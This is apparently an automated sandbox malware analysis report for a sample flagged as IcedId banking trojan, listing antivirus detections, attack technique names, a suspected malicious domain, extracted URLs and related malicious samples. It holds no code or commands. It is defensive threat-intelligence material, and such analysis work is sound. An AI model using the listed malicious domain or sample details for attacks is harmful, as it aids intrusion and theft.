          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Information Discovery113Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          sample4.exe77%VirustotalBrowse
          sample4.exe3%MetadefenderBrowse
          sample4.exe79%ReversingLabsWin32.Worm.Cridex
          sample4.exe100%AviraTR/IcedId.ltfzr

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.sample4.exe.d0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          gegemony4you.top6%VirustotalBrowse
          www.intel.ch0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://static.ads-twitter.com0%URL Reputationsafe
          https://static.ads-twitter.com0%URL Reputationsafe
          https://static.ads-twitter.com0%URL Reputationsafe
          https://static.ads-twitter.com0%URL Reputationsafe
          https://cdn.cms-twdigitalassets.com/content/dam/help-twitter/logos/card_wide_blue.png0%Avira URL Cloudsafe
          https://cdn.cms-twdigitalassets.com0%VirustotalBrowse
          https://cdn.cms-twdigitalassets.com0%Avira URL Cloudsafe
          https://cdn.goglobalwithtwitter.com0%Avira URL Cloudsafe
          https://feedback.digital-cloud-prem.medallia.com;0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          s.twitter.com
          104.244.42.131
          truefalse
            high
            support.oracle.com
            unknown
            unknownfalse
              high
              www.oracle.com
              unknown
              unknownfalse
                high
                g.msn.com
                unknown
                unknownfalse
                  high
                  help.twitter.com
                  unknown
                  unknownfalse
                    high
                    www.intel.com
                    unknown
                    unknownfalse
                      high
                      gegemony4you.top
                      unknown
                      unknowntrueunknown
                      www.intel.ch
                      unknown
                      unknownfalseunknown
                      corpredirect.intel.com
                      unknown
                      unknownfalse
                        high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://outlook.live.com/owa/sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpfalse
                          high
                          https://help.twitter.com/en/using-twitter#search-and-trendssample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                            high
                            https://help.twitter.com/en/managing-your-account/notifications-on-mobile-devicessample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                              high
                              https://help.twitter.com/frsample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                high
                                https://about.twitter.com/en_us/safety.htmlsample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                  high
                                  https://developer.twitter.com/en/docssample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                    high
                                    https://help.twitter.com/en/managing-your-account#login-and-passwordsample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                      high
                                      https://blog.twitter.com/sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                        high
                                        https://help.twitter.com/filsample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpfalse
                                          high
                                          https://about.twitter.com/en_us/company.htmlsample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                            high
                                            https://help.twitter.com/nlsample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpfalse
                                              high
                                              https://help.twitter.com/fasample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpfalse
                                                high
                                                https://twitter.com/AppleSupportsample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://twitter.com/applesupportsample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://resources.digital-cloud-prem.medallia.comsample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://help.twitter.com/fisample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://templates.office.com/sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://twitter.com/i/csp_report;sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://business.twitter.com/en/advertising.htmlsample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://help.twitter.com/nosample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://static.ads-twitter.comsample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://help.twitter.com/en/rules-and-policies/twitter-rulessample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://cdn.cms-twdigitalassets.com/content/dam/help-twitter/logos/card_wide_blue.pngsample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://help.twitter.com/gusample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://api.twitter.comsample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://help.twitter.com/en/using-twitter#adding-content-to-your-tweetsample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://blog.twitter.com/en_us/topics/company/2020/covid-19.htmlsample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://twitter.comsample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://www.twitterflightschool.com/sl/382652bcsample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://help.twitter.com/en/rules-and-policies#law-enforcement-guildelinessample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://login.microsoftonline.com/common/oauth2/authorize?response_mode=form_postsample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://support.xbox.com/sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://help.twitter.com/en/managing-your-accountsample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://help.twitter.com/en/using-twitter/mentions-and-repliessample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://help.twitter.com/en/rulessample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://cdn.cms-twdigitalassets.comsample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpfalse
                                                                                          • 0%, Virustotal, Browse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://www.wikidata.org/wiki/Q65129345sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://help.twitter.com/en/a-safer-twittersample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://transparency.twitter.com/sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://business.twitter.com/en/help.htmlsample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://help.twitter.com/en/twitter-guidesample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://cdn.goglobalwithtwitter.comsample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://schema.org/VideoObjectsample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://help.twitter.com/en/using-twitter/tweeting-gifs-and-picturessample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://help.twitter.com/en/how-you-can-control-your-privacysample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          https://help.twitter.com/en/using-twitter/advanced-twitter-mute-optionssample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            https://careers.twitter.com/sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              https://support.xbox.comsample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://help.twitter.com/husample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://blog.twitter.com/developer/sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.microsoftstore.com/store/msusa/en_US/DisplayAddEditPaymentPage/sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://help.twitter.comsample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        https://help.twitter.com/hrsample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.microsoftstore.com/store/msusa/en_US/wishlists?Wt.mc_id=wishlist_landingpagesample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.microsoftstore.com/store/msusa/en_US/DisplayFindYourOrderPage/nextAction.DisplayAccountRsample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://www.skype.com/en/sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                https://help.twitter.com/en/managing-your-account#verified-accountssample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://media.twitter.com/sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.microsoftstore.com/store/msusa/en_US/DisplayFindYourOrderPage/nextAction.DisplayAccountOsample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://help.twitter.com/hesample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://data.twitter.com/sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://developer.twitter.com/en/communitysample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://help.twitter.com/plsample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://schema.orgsample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://help.twitter.com/en/managing-your-account#notificationssample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://status.twitterstat.us/sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://help.twitter.com/ptsample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://help.twitter.com/hisample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.onenote.com/sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://help.twitter.com/en/rules-and-policies#twitter-rulessample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://help.twitter.com/itsample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://help.twitter.com/en/glossarysample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://help.twitter.com/jasample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://cards-dev.twitter.com/validatorsample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://ogp.me/ns#sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://help.twitter.com/arsample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://about.twitter.com/en_us/company/twitter-for-good.htmlsample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://privacy.twitter.com/sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://help.twitter.com/en/using-twitter#tweetssample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://marketing.twitter.com/en/insightssample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://about.twitter.com/en_us/company/brand-resources.htmlsample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://help.twitter.com/idsample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://schema.org/Organizationsample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://twitter.com/login?redirect_after_login=https://help.twitter.com/ensample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://business.twitter.com/en/resources.htmlsample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://help.twitter.com/en/contact-ussample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://video.twimg.com/tweet_video/EAa_YvRU4AAH-IN.mp4sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://business.twitter.com/sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://help.twitter.com/en/safety-and-security/how-to-make-twitter-private-and-publicsample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://help.twitter.com/bnsample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://help.twitter.com/sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://feedback.digital-cloud-prem.medallia.com;sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      low
                                                                                                                                                                                                      https://twitter.com/privacysample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://help.twitter.com/sksample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://templates.office.com/collection-family-activitiessample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://www.microsoftstore.com/store/msusa/en_US/DisplayFindYourOrderPage/nextAction.DisplayDownloadsample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://marketing.twitter.com/en/success-storiessample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://twitter.com/logoutsample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://help.twitter.com/en/using-twitter/direct-messagessample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://help.twitter.com/rosample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                                      high

                                                                                                                                                                                                                      Contacted IPs

                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                                      Public

                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                      104.244.42.131
                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                      13414TWITTERUSfalse

                                                                                                                                                                                                                      Private

                                                                                                                                                                                                                      IP
                                                                                                                                                                                                                      192.168.2.1

                                                                                                                                                                                                                      General Information

                                                                                                                                                                                                                      Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                                                                                      Analysis ID:339451
                                                                                                                                                                                                                      Start date:14.01.2021
                                                                                                                                                                                                                      Start time:04:01:56
                                                                                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                                      Overall analysis duration:0h 7m 38s
                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                      Sample file name:sample4.bin (renamed file extension from bin to exe)
                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                                                      Number of analysed new started processes analysed:40
                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                      • HDC enabled
                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                      Classification:mal100.troj.evad.winEXE@6/20@8/2
                                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                                      HDC Information:
                                                                                                                                                                                                                      • Successful, ratio: 1.6% (good quality ratio 1.5%)
                                                                                                                                                                                                                      • Quality average: 78.6%
                                                                                                                                                                                                                      • Quality standard deviation: 26.7%
                                                                                                                                                                                                                      HCA Information:Failed
                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                      • Adjust boot time
                                                                                                                                                                                                                      • Enable AMSI
                                                                                                                                                                                                                      Warnings:
                                                                                                                                                                                                                      Show All
                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, RuntimeBroker.exe, wermgr.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 13.64.90.137, 52.147.198.201, 2.20.84.85, 20.190.129.19, 40.126.1.142, 20.190.129.2, 40.126.1.130, 40.126.1.145, 20.190.129.128, 20.190.129.160, 20.190.129.130, 51.11.168.160, 93.184.221.240, 92.122.213.194, 92.122.213.247, 20.54.26.129, 104.43.139.144, 51.104.139.180, 52.142.114.176, 40.88.32.150, 104.83.125.175, 104.83.83.83, 2.20.84.4, 2.21.61.56, 2.20.84.208, 2.17.181.200, 52.155.217.156
                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): intel11.edgekey.net, arc.msn.com.nsatc.net, intel11.cn.edgekey.net, support-china.apple-support.akadns.net, fs-wildcard.microsoft.com.edgekey.net, ev.support.microsoft.com.edgekey.net, skypedataprdcoleus15.cloudapp.net, prod-support.apple-support.akadns.net, support.oracle.com.edgekey.net, e3843.g.akamaiedge.net, login.live.com, audownload.windowsupdate.nsatc.net, hlb.apr-52dd2-0.edgecastdns.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, fs.microsoft.com, e2581.dscx.akamaiedge.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, www.tm.a.prd.aadg.akadns.net, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, e2063.e9.akamaiedge.net, e11.dsca.akamaiedge.net, blobcollector.events.data.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net, intel19233.edgekey.net, e19233.dsca.akamaiedge.net, support.microsoft.com, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, g-msn-com-nsatc.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, intel11.cn.edgekey.net.globalredir.akadns.net, support.apple.com, support.apple.com.edgekey.net, cs11.wpc.v0cdn.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, e870.x.akamaiedge.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, wu.ec.azureedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, ds-www.oracle.com.edgekey.net, login.msa.msidentity.com, skypedataprdcoleus16.cloudapp.net
                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                      04:04:49API Interceptor9x Sleep call for process: sample4.exe modified

                                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                                      IPs

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                      104.244.42.131https://cypressbayhockey.com/NOGet hashmaliciousBrowse
                                                                                                                                                                                                                        details.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                          details.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                            https://numisconsult.com/blog/e47c4b8720db7445599988579a03c7c5Get hashmaliciousBrowse
                                                                                                                                                                                                                              https://sosefinawinnifredsullivan8-5ce0e.gr8.com/Get hashmaliciousBrowse
                                                                                                                                                                                                                                http://kikicustomwigs.com/inefficient.phpGet hashmaliciousBrowse
                                                                                                                                                                                                                                  https://www.evernote.com/shard/s395/sh/e6cd3f32-356e-2b0f-29eb-532205cb0cdd/b301c5a7d8494fe2a6f2588862012fb5Get hashmaliciousBrowse
                                                                                                                                                                                                                                    https://doc.clickup.com/p/h/853bx-28/ee9d693560ec8e5Get hashmaliciousBrowse
                                                                                                                                                                                                                                      https://doc.clickup.com/p/h/84zph-7/c3996c24fc61b45Get hashmaliciousBrowse
                                                                                                                                                                                                                                        https://cts.indeed.com/v0?tk=1df9t5skc2g3980p&r=%68%74%74%70%73%3a%2f%2f%61%6e%61%6c%79%74%69%63%73%2e%74%77%69%74%74%65%72%2e%63%6f%6d%2f%64%61%61%2f%30%2f%64%61%61%5f%6f%70%74%6f%75%74%5f%61%63%74%69%6f%6e%73%3f%61%63%74%69%6f%6e%5f%69%64%3d%33%26%70%61%72%74%69%63%69%70%61%6e%74%5f%69%64%3d%37%31%36%26%72%64%3d%68%74%74%70%73%3a%2f%2f%66%72%61%31%2e%64%69%67%69%74%61%6c%6f%63%65%61%6e%73%70%61%63%65%73%2e%63%6f%6d%2f%73%32%32%2f%69%6e%64%65%78%2e%68%74%6d%6c%3f#matthias.kirsch@iti.orgGet hashmaliciousBrowse
                                                                                                                                                                                                                                          WSGaRIW.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                            SecuriteInfo.com.Variant.Mikey.116711.25037.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                              https://call.lifesizecloud.com/4478671Get hashmaliciousBrowse
                                                                                                                                                                                                                                                VSMecyU.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                  https://recovermy3-account.com/Get hashmaliciousBrowse
                                                                                                                                                                                                                                                    https://recovermy3-account.com/Get hashmaliciousBrowse
                                                                                                                                                                                                                                                      temp.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                        iuyala11.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                          temp.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                            temp.dllGet hashmaliciousBrowse

                                                                                                                                                                                                                                                              Domains

                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                                                              s.twitter.comhttp://search.hwatchtvnow.coGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.131
                                                                                                                                                                                                                                                              http://search.hshipmenttracker.coGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.67
                                                                                                                                                                                                                                                              https://t.yesware.com/tt/ae9851ab7b578dad1289f08bbf450624f7ae3a45/2ee42987f58d2f32bb36ff11a00dd921/2f4e7e35c28c3b7f4958904f5584a915/joom.ag/2VFCGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.195
                                                                                                                                                                                                                                                              https://joom.ag/3wFCGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.3

                                                                                                                                                                                                                                                              ASN

                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                                                              TWITTERUShttp://message.mydopweb.comGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.193
